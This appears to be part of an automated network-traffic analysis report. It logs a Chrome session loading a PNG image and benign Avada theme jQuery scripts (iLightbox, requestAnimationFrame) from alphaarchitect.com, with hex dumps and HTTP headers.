                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 03 d8 44 44 7f 96 4a a5 56 12 91 0f e0 5d c3 f7 9f 4d ed d9 73 8d d1 de 7e 9f 00 ea e5 54 a0 67 38 ad bd d8 17 40 0e 33 0e bd 07 c0 06 73 b1 27 ec 0c e3 4d 78 de 4e 00 67 74 97 d2 2c 56 e8 c8 91 23 b8 4c 90 e7 79 8d 4a a9 bf 22 a2 0f f2 f1 7b d8 4a d7 75 ad 8a 8a 0a b2 6d 1b 52 ca c0 1f 1c 9c 08 bf f8 c5 6a e3 6b 5f 33 84 ef 4f 05 37 4f a9 54 79 6d 53 e1 cf e1 11 a1 9e b5 ca 19 b2 97 ff 85 20 94 6d 7f 26 b5 79 f3 e7 75 75 d7 e8 73 76 c0 95 52 ee b4 2c eb 93 95 95 95 37 d7 d4 d4 98 5c d1 61 18 06 88 08 88 91 61 88 e0 f0 61 a4 1f 79 04 c1 c9 93 7f 18 f4 38 84 85 db 4b b7 49 d6 65 9b 0d 03 d6 45 9c b0 93 44 07 85 e3 ec 02 e0 eb 6e a5 59 d2 eb ec 44 54 09 60 5b 32 99 fc db e5 cb 97 bb 1c f8 99 41 8f 21 d3 84 24 82 cf 81 0f da db 67 56 f6 a9 e3 22 6d a5 db fd
                                                                                                                                                                                                                                                                        Data Ascii: DDJV]Ms~Tg8@3s'MxNgt,V#LyJ"{JumRjk_3O7OTymS m&yuusvR,7\aaay8KIeEDnYDT`[2A!$gV"m
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 75 b5 70 1c 07 44 34 75 fd fb 1c 08 b3 59 98 96 05 32 0c 88 28 42 cf a9 53 78 e7 8d 37 50 db dc 8c a1 de 5e 74 f2 f3 e1 c3 87 51 f9 b3 9f c1 95 12 f9 61 4e 2b 95 53 15 9c 89 67 0c 23 f4 ea eb ef 05 b0 4f 77 2b 8d 0e 7b 61 d6 b0 af 1a 84 35 26 01 06 eb 1a 84 f7 2d 33 b1 ad c9 c1 a6 a6 14 12 8e a5 52 c9 04 d5 d5 d5 c5 c3 fa f9 a3 94 82 9f 4e c3 49 24 00 a2 dc f1 c9 1f fc 00 c7 3f f1 09 d8 83 83 33 c2 2e d8 61 29 f3 97 dc f2 8f 95 61 db 1f 01 f0 94 ee 56 9a a5 1a 76 8f 35 8a 55 76 f6 fb ec 1a c4 10 5b 69 13 5a ab 0c dc 54 6f 46 2b 2b cc b1 cd cb 13 75 eb 57 ad 40 7c 2b 2b 5c 74 e2 e1 fe 81 9d 3b 91 fd c5 2f 80 69 41 0e d8 21 29 21 66 0b 7a 3c b4 67 ee 67 bf ac bb 95 66 29 ce c6 7b ec 93 ec cb 45 7c 08 79 28 76 2c 54 68 1b 11 78 fe 4c 18 7c bb 23 38 76 ac 77
                                                                                                                                                                                                                                                                        Data Ascii: upD4uY2(BSx7P^tQaN+Sg#Ow+{a5&-3RNI$?3.a)aVv5Uv[iZToF++uW@|++\t;/iA!)!fz<ggf){E|y(v,ThxL|#8vw
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: d7 5d 5b bf 6a 15 26 d3 69 64 83 40 d8 9e f7 e2 c7 9f 79 66 4c 77 1f cd d5 16 f6 2c fb 1c fb af 6c 07 2e 1f 92 7d 89 35 d8 db b1 00 dc bc 7b f7 b9 ae b6 b6 53 2b 5b 5b d7 be 7f f7 6e 80 19 1e 18 50 6b 6e ba 69 43 b2 b6 f6 1a be f0 e6 5d bd 99 46 73 b5 84 7d 8c fd 1f f6 4b f1 f1 e5 46 b2 df 66 6b 58 c1 9a b8 4c fc d3 be 7d 66 6d 6d ed 1f f7 9e 3a b5 6c e5 9a 35 58 d6 d2 02 c3 b2 20 85 b0 fc 6c f6 de 4c 26 93 32 4d f3 73 00 de d6 dd 48 73 45 c3 b7 ab 6a 64 ff 9a 75 16 c1 df a5 89 fd 29 ab 66 f1 68 ac 2a e2 5e 5c 00 6d 6d 6d a9 f6 f6 f6 cf 8e 8d 8e 4e 48 29 d5 74 24 3f e7 5d 77 bd ef bc f3 ce dd d7 7f e9 70 0b 7f f6 d6 d8 8d ac 31 cf 7f 6b 25 7b 4b fc 79 5b 58 57 f7 c6 b2 b8 36 ef 86 28 73 7e ef 52 9c a0 1b 60 f7 b3 c1 3c 3b af c7 ae 61 df cb de c9 7e 84 fd
                                                                                                                                                                                                                                                                        Data Ascii: ][j&id@yfLw,l.}5{S+[[nPkniC]Fs}KFfkXL}fmm:l5X lL&2MsHsEjdu)fh*^\mmmNH)t$?]wp1k%{Ky[XW6(s~R`<;a~
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: c7 29 58 21 47 3e f6 21 81 46 b4 40 8f c9 d8 86 34 d5 41 ac 86 0d 71 f8 85 f7 ad 13 59 98 87 b3 6a 5b 39 16 c2 89 36 d4 c3 87 28 f4 18 87 12 38 90 2c 22 68 44 44 7a ce 27 09 a9 af 99 71 08 ab 90 85 16 bc 45 15 5c f8 02 33 66 a3 14 b9 42 0d 3a 51 8c 1c f5 b9 00 7c c2 52 f1 0c 14 e0 18 8a 34 e4 a6 ad d8 ff b4 77 ee c1 51 55 77 1c 67 37 8f cd cb 35 c9 f2 14 c8 02 45 69 45 3b 30 a8 2d 1d 4c 98 89 14 0a d6 8a 23 50 a8 d5 aa 10 a4 30 80 03 76 a0 cd 8c 15 5b eb 74 fa 40 6b 0b 01 86 52 68 b1 75 5a 65 8a af ea 40 1b 1d 53 40 40 7c 60 1c 08 cf 44 30 86 4d 08 49 60 b3 bb c9 fa fd e3 cb cc 6f ce dc b3 ee bd 77 77 09 33 e7 3b f3 99 6c 76 ef 3d f7 bc 7e e7 fc ee 39 e7 9e 7b b9 17 e4 88 fb 48 90 6a 15 82 47 be 64 b0 ae 5b 18 ba 87 73 d3 f7 00 9f 0b f7 7d b2 68 ed b7 80
                                                                                                                                                                                                                                                                        Data Ascii: )X!G>!F@4AqYj[96(8,"hDDz'qE\3fB:Q|R4wQUwg75EiE;0-L#P0v[t@kRhuZe@S@@|`D0MI`oww3;lv=~9{HjGd[s}h
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: a5 3b 7f 51 18 7b 99 45 de df 22 d2 db 0d a2 9a b2 f5 28 71 2b 05 5e bb c6 3e 1e 8c 01 99 50 03 58 0c 0e 26 39 ca fd 3e 70 ab b0 58 e2 39 08 3c 04 6e 04 41 1a e9 9d 5c ca eb 73 b1 b1 c2 46 78 48 cb 40 15 58 c2 a9 92 71 62 29 eb 3b c0 8d 2e 82 76 51 29 7f c4 4a 12 64 e5 2b 67 05 1b 0a ec ea 02 f8 4c 84 bd 80 0d 58 90 7c 8b 61 0f 03 6e b5 4f 78 1f 5f 61 4f b6 88 e9 a9 02 bf 13 ab ed c2 19 d8 29 e8 ac f8 3c 09 3c c8 fa 71 a7 b8 0f 0f 31 1e 27 85 b1 3f 4d 6f f8 76 30 19 fc 98 e7 66 91 d3 20 c2 f3 3e 11 d3 83 bf 06 4b 99 de f9 e0 49 f0 7d d1 29 1c 00 3d 6a dc 78 1d 35 6e 21 96 1b 5b e3 e4 5c f8 ef 80 02 90 6e 35 f1 5e 66 8f 8d ed a7 df 06 73 5d 3e 34 72 04 d4 31 9d 3e b0 9a 19 dd cd 82 09 30 6e 17 80 1f d8 d5 31 36 98 93 35 b7 23 b5 f4 66 dc a8 15 ec 04 5f 65
                                                                                                                                                                                                                                                                        Data Ascii: ;Q{E"(q+^>PX&9>pX9<nA\sFxH@Xqb);.vQ)Jd+gLX|anOx_aO)<<q1'?Mov0f >KI})=jx5n![\n5^fs]>4r1>0n165#f_e
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC116INData Raw: 3f bf 07 fe 04 de b8 bc 31 a1 29 6e 23 a3 cc 0c ea 95 83 cd e0 35 f0 ba e0 17 60 2b 3f 5b b1 03 2c 02 35 09 a8 06 cf f2 78 1d 4b 4d 49 18 19 65 40 7c 9f 5a 9e 05 39 c0 07 f2 34 f8 80 d7 61 f8 92 1c 53 0a 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 e9 d3 17 70 60 80 70 c4 de f9 4c 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                        Data Ascii: ?1)n#5`+?[,5xKMIe@|Z94aSFFFFFFFFFFFFFFFFFFFFFFFFFp`pLIENDB`


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        14192.168.2.449762141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC839OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.ilightbox.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:45 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-14282"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147803
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9bdfb17435c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC876INData Raw: 37 64 63 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 24 2c 77 69 6e 64 6f 77 2c 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 65 78 74 65 6e 73 69 6f 6e 73 3d 7b 66 6c 61 73 68 3a 5b 22 73 77 66 22 5d 2c 69 6d 61 67 65 3a 5b 22 62 6d 70 22 2c 22 67 69 66 22 2c 22 6a 70 65 67 22 2c 22 6a 70 67 22 2c 22 70 6e 67 22 2c 22 74 69 66 66 22 2c 22 74 69 66 22 2c 22 6a 66 69 66 22 2c 22 6a 70 65 22 2c 22 77 65 62 70 22 5d 2c 69 66 72 61 6d 65 3a 5b 22 61 73 70 22 2c 22 61 73 70 78 22 2c 22 63 67 69 22 2c 22 63 66 6d 22 2c 22 68 74 6d 22 2c 22 68 74 6d 6c 22 2c 22 6a 73 70 22 2c 22 70 68 70 22 2c 22 70 6c 22 2c 22 70 68 70 33 22 2c 22 70 68 70 34 22 2c 22 70 68 70 35 22 2c 22 70 68 74 6d 6c 22 2c 22 72 62 22 2c 22 72 68 74 6d 6c 22 2c 22 73 68 74 6d 6c 22 2c 22 74 78 74
                                                                                                                                                                                                                                                                        Data Ascii: 7dc3!function($,window,undefined){var extensions={flash:["swf"],image:["bmp","gif","jpeg","jpg","png","tiff","tif","jfif","jpe","webp"],iframe:["asp","aspx","cgi","cfm","htm","html","jsp","php","pl","php3","php4","php5","phtml","rb","rhtml","shtml","txt
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 75 73 65 72 41 67 65 6e 74 29 7c 7c 2f 31 32 30 37 7c 36 33 31 30 7c 36 35 39 30 7c 33 67 73 6f 7c 34 74 68 70 7c 35 30 5b 31 2d 36 5d 69 7c 37 37 30 73 7c 38 30 32 73 7c 61 20 77 61 7c 61 62 61 63 7c 61 63 28 65 72 7c 6f 6f 7c 73 5c 2d 29 7c 61 69 28 6b 6f 7c 72 6e 29 7c 61 6c 28 61 76 7c 63 61 7c 63 6f 29 7c 61 6d 6f 69 7c 61 6e 28 65 78 7c 6e 79 7c 79 77 29 7c 61 70 74 75 7c 61 72 28 63 68 7c 67 6f 29 7c 61 73 28 74 65 7c 75 73 29 7c 61 74 74 77 7c 61 75 28 64 69 7c 5c 2d 6d 7c 72 20 7c 73 20 29 7c 61 76 61 6e 7c 62 65 28 63 6b 7c 6c 6c 7c 6e 71 29 7c 62 69 28 6c 62 7c 72 64 29 7c 62 6c 28 61 63 7c 61 7a 29 7c 62 72 28 65 7c 76 29 77 7c 62 75 6d 62 7c 62 77 5c 2d 28 6e 7c 75 29 7c 63 35 35 5c 2f 7c 63 61 70 69 7c 63 63 77 61 7c 63 64 6d 5c 2d 7c 63 65
                                                                                                                                                                                                                                                                        Data Ascii: userAgent)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|ce
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 6c 6b 29 7c 74 63 6c 5c 2d 7c 74 64 67 5c 2d 7c 74 65 6c 28 69 7c 6d 29 7c 74 69 6d 5c 2d 7c 74 5c 2d 6d 6f 7c 74 6f 28 70 6c 7c 73 68 29 7c 74 73 28 37 30 7c 6d 5c 2d 7c 6d 33 7c 6d 35 29 7c 74 78 5c 2d 39 7c 75 70 28 5c 2e 62 7c 67 31 7c 73 69 29 7c 75 74 73 74 7c 76 34 30 30 7c 76 37 35 30 7c 76 65 72 69 7c 76 69 28 72 67 7c 74 65 29 7c 76 6b 28 34 30 7c 35 5b 30 2d 33 5d 7c 5c 2d 76 29 7c 76 6d 34 30 7c 76 6f 64 61 7c 76 75 6c 63 7c 76 78 28 35 32 7c 35 33 7c 36 30 7c 36 31 7c 37 30 7c 38 30 7c 38 31 7c 38 33 7c 38 35 7c 39 38 29 7c 77 33 63 28 5c 2d 7c 20 29 7c 77 65 62 63 7c 77 68 69 74 7c 77 69 28 67 20 7c 6e 63 7c 6e 77 29 7c 77 6d 6c 62 7c 77 6f 6e 75 7c 78 37 30 30 7c 79 61 73 5c 2d 7c 79 6f 75 72 7c 7a 65 74 6f 7c 7a 74 65 5c 2d 2f 69 2e 74 65
                                                                                                                                                                                                                                                                        Data Ascii: lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.te
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 6c 6f 73 65 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 74 69 74 6c 65 3d 22 27 2b 6e 2e 6f 70 74 69 6f 6e 73 2e 74 65 78 74 2e 63 6c 6f 73 65 2b 27 22 3e 3c 2f 61 3e 27 29 2c 66 75 6c 6c 53 63 72 65 65 6e 42 75 74 74 6f 6e 3a 24 28 27 3c 61 20 63 6c 61 73 73 3d 22 69 6c 69 67 68 74 62 6f 78 2d 66 75 6c 6c 73 63 72 65 65 6e 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 74 69 74 6c 65 3d 22 27 2b 6e 2e 6f 70 74 69 6f 6e 73 2e 74 65 78 74 2e 65 6e 74 65 72 46 75 6c 6c 73 63 72 65 65 6e 2b 27 22 3e 3c 2f 61 3e 27 29 2c 69 6e 6e 65 72 50 6c 61 79 42 75 74 74 6f 6e 3a 24 28 27 3c 61 20 63 6c 61 73 73 3d 22 69 6c 69 67 68 74 62 6f 78 2d 70 6c 61 79 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 74 69 74 6c 65 3d 22 27 2b 6e 2e 6f 70 74 69 6f 6e 73 2e 74
                                                                                                                                                                                                                                                                        Data Ascii: lose" role="button" title="'+n.options.text.close+'"></a>'),fullScreenButton:$('<a class="ilightbox-fullscreen" role="button" title="'+n.options.text.enterFullscreen+'"></a>'),innerPlayButton:$('<a class="ilightbox-play" role="button" title="'+n.options.t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6c 69 67 68 74 62 6f 78 2d 74 68 75 6d 62 6e 61 69 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 69 6c 69 67 68 74 62 6f 78 2d 74 68 75 6d 62 6e 61 69 6c 73 2d 64 72 61 67 67 65 72 22 3e 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6c 69 67 68 74 62 6f 78 2d 74 68 75 6d 62 6e 61 69 6c 73 2d 67 72 69 64 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 27 29 2c 74 68 75 6d 62 73 3a 21 31 2c 6e 65 78 74 4c 6f 63 6b 3a 21 31 2c 70 72 65 76 4c 6f 63 6b 3a 21 31 2c 68 61 73 68 4c 6f 63 6b 3a 21 31 2c 69 73 4d 6f 62 69 6c 65 3a 21 31 2c 6d 6f 62 69 6c 65 4d 61 78 57 69 64 74 68 3a 39 38 30 2c 69 73 49 6e 46 75 6c 6c 53 63 72 65 65 6e 3a
                                                                                                                                                                                                                                                                        Data Ascii: return false;"><div class="ilightbox-thumbnails-container"><a class="ilightbox-thumbnails-dragger"></a><div class="ilightbox-thumbnails-grid"></div></div></div>'),thumbs:!1,nextLock:!1,prevLock:!1,hashLock:!1,isMobile:!1,mobileMaxWidth:980,isInFullScreen:
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 22 69 6e 20 77 69 6e 64 6f 77 7c 7c 28 74 3d 22 63 6c 69 65 6e 74 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2c 7b 77 69 64 74 68 3a 65 5b 74 2b 22 57 69 64 74 68 22 5d 2c 68 65 69 67 68 74 3a 65 5b 74 2b 22 48 65 69 67 68 74 22 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6d 6f 76 65 48 61 73 68 28 29 7b 76 61 72 20 65 3d 67 65 74 53 63 72 6f 6c 6c 58 59 28 29 3b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3d 22 22 2c 77 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 54 6f 28 65 2e 78 2c 65 2e 79 29 7d 66 75 6e 63 74 69 6f 6e 20 64 6f 41 6a 61 78 28 65 2c 74 29 7b 65 3d 22 2f 2f 69 6c 69 67 68 74 62 6f 78 2e 6e 65 74 2f 67 65 74 53 6f
                                                                                                                                                                                                                                                                        Data Ascii: innerWidth"in window||(t="client",e=document.documentElement||document.body),{width:e[t+"Width"],height:e[t+"Height"]}}function removeHash(){var e=getScrollXY();window.location.hash="",window.scrollTo(e.x,e.y)}function doAjax(e,t){e="//ilightbox.net/getSo
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 28 74 3d 6a 51 75 65 72 79 28 74 29 29 2e 61 74 74 72 28 22 64 61 74 61 2d 6d 65 64 69 61 2d 74 79 70 65 22 29 3b 65 26 26 28 6f 3d 65 29 7d 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 70 65 72 63 65 6e 74 54 6f 56 61 6c 75 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 70 61 72 73 65 49 6e 74 28 74 2f 31 30 30 2a 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 61 72 73 65 55 52 49 28 65 29 7b 76 61 72 20 74 3d 53 74 72 69 6e 67 28 65 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 73 2b 7c 5c 73 2b 24 2f 67 2c 22 22 29 2e 6d 61 74 63 68 28 2f 5e 28 5b 5e 3a 5c 2f 3f 23 5d 2b 3a 29 3f 28 5c 2f 5c 2f 28 3f 3a 5b 5e 3a 40 5d 2a 28 3f 3a 3a 5b 5e 3a 40 5d 2a 29 3f 40 29 3f 28 28 5b 5e 3a 5c 2f 3f 23 5d 2a 29 28 3f 3a 3a 28 5c 64 2a 29 29 3f 29 29 3f 28 5b 5e 3f 23 5d 2a
                                                                                                                                                                                                                                                                        Data Ascii: (t=jQuery(t)).attr("data-media-type");e&&(o=e)}return o}function percentToValue(e,t){return parseInt(t/100*e)}function parseURI(e){var t=String(e).replace(/^\s+|\s+$/g,"").match(/^([^:\/?#]+:)?(\/\/(?:[^:@]*(?::[^:@]*)?@)?(([^:\/?#]*)(?::(\d*))?))?([^?#]*
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 28 22 2e 22 29 3a 5b 2d 38 5d 7d 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 69 73 4e 61 4e 28 65 29 3f 72 5b 65 5d 7c 7c 2d 37 3a 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 3a 30 7d 3b 66 6f 72 28 65 3d 73 28 65 29 2c 74 3d 73 28 74 29 2c 69 3d 6d 61 78 28 65 2e 6c 65 6e 67 74 68 2c 74 2e 6c 65 6e 67 74 68 29 2c 6e 3d 30 3b 6e 3c 69 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 21 3d 74 5b 6e 5d 29 7b 69 66 28 65 5b 6e 5d 3d 6c 28 65 5b 6e 5d 29 2c 74 5b 6e 5d 3d 6c 28 74 5b 6e 5d 29 2c 65 5b 6e 5d 3c 74 5b 6e 5d 29 7b 61 3d 2d 31 3b 62 72 65 61 6b 7d 69 66 28 65 5b 6e 5d 3e 74 5b 6e 5d 29 7b 61 3d 31 3b 62 72 65 61 6b 7d 7d 69 66 28 21 6f 29 72 65 74 75 72 6e 20 61 3b 73 77 69 74 63 68 28 6f 29 7b 63 61 73 65 22 3e 22 3a 63 61 73 65 22
                                                                                                                                                                                                                                                                        Data Ascii: ("."):[-8]},l=function(e){return e?isNaN(e)?r[e]||-7:parseInt(e,10):0};for(e=s(e),t=s(t),i=max(e.length,t.length),n=0;n<i;n++)if(e[n]!=t[n]){if(e[n]=l(e[n]),t[n]=l(t[n]),e[n]<t[n]){a=-1;break}if(e[n]>t[n]){a=1;break}}if(!o)return a;switch(o){case">":case"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 69 6f 6e 73 2e 70 61 74 68 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3f 65 2e 76 61 72 73 2e 6c 6f 61 64 52 65 71 75 65 73 74 73 3c 3d 30 26 26 65 2e 76 61 72 73 2e 6c 6f 61 64 65 72 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 69 6c 69 67 68 74 62 6f 78 2d 73 68 6f 77 22 29 2e 73 74 6f 70 28 29 2e 61 6e 69 6d 61 74 65 28 7b 74 6f 70 3a 22 2d 31 39 32 70 78 22 7d 2c 65 2e 6f 70 74 69 6f 6e 73 2e 73 68 6f 77 2e 73 70 65 65 64 2c 22 65 61 73 65 49 6e 43 69 72 63 22 29 3a 65 2e 76 61 72 73 2e 6c 6f 61 64 52 65 71 75 65 73 74 73 3c 3d 30 26 26 65 2e 76 61 72 73 2e 6c 6f 61 64 65 72 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 69 6c 69 67 68 74 62 6f 78 2d 73 68 6f 77 22 29 2e 73 74 6f 70 28 29 2e 61 6e 69 6d 61 74 65 28 7b 6c 65 66 74 3a 22 2d 31 39 32 70 78 22 7d
                                                                                                                                                                                                                                                                        Data Ascii: ions.path.toLowerCase()?e.vars.loadRequests<=0&&e.vars.loader.removeClass("ilightbox-show").stop().animate({top:"-192px"},e.options.show.speed,"easeInCirc"):e.vars.loadRequests<=0&&e.vars.loader.removeClass("ilightbox-show").stop().animate({left:"-192px"}
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC1369INData Raw: 72 43 61 73 65 28 29 3a 67 65 74 54 79 70 65 42 79 45 78 74 65 6e 73 69 6f 6e 28 6e 29 2c 63 3d 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 6e 3f 67 65 74 45 78 74 65 6e 73 69 6f 6e 28 6e 29 3a 22 22 3b 69 66 28 61 2e 74 68 75 6d 62 6e 61 69 6c 3d 61 2e 74 68 75 6d 62 6e 61 69 6c 7c 7c 28 22 69 6d 61 67 65 22 3d 3d 6c 3f 6e 3a 6e 75 6c 6c 29 2c 61 2e 76 69 64 65 6f 54 79 70 65 3d 61 2e 76 69 64 65 6f 54 79 70 65 7c 7c 6e 75 6c 6c 2c 61 2e 73 6b 69 6e 3d 61 2e 73 6b 69 6e 7c 7c 65 2e 6f 70 74 69 6f 6e 73 2e 73 6b 69 6e 2c 61 2e 77 69 64 74 68 3d 61 2e 77 69 64 74 68 7c 7c 6e 75 6c 6c 2c 61 2e 68 65 69 67 68 74 3d 61 2e 68 65 69 67 68 74 7c 7c 6e 75 6c 6c 2c 61 2e 6d 6f 75 73 65 77 68 65 65 6c 3d 76 6f 69 64 20 30 3d 3d 3d 61 2e 6d 6f 75 73 65 77 68
                                                                                                                                                                                                                                                                        Data Ascii: rCase():getTypeByExtension(n),c="object"!=typeof n?getExtension(n):"";if(a.thumbnail=a.thumbnail||("image"==l?n:null),a.videoType=a.videoType||null,a.skin=a.skin||e.options.skin,a.width=a.width||null,a.height=a.height||null,a.mousewheel=void 0===a.mousewh


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        15192.168.2.449763141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:44 UTC637OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.requestAnimationFrame.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:45 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:45 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
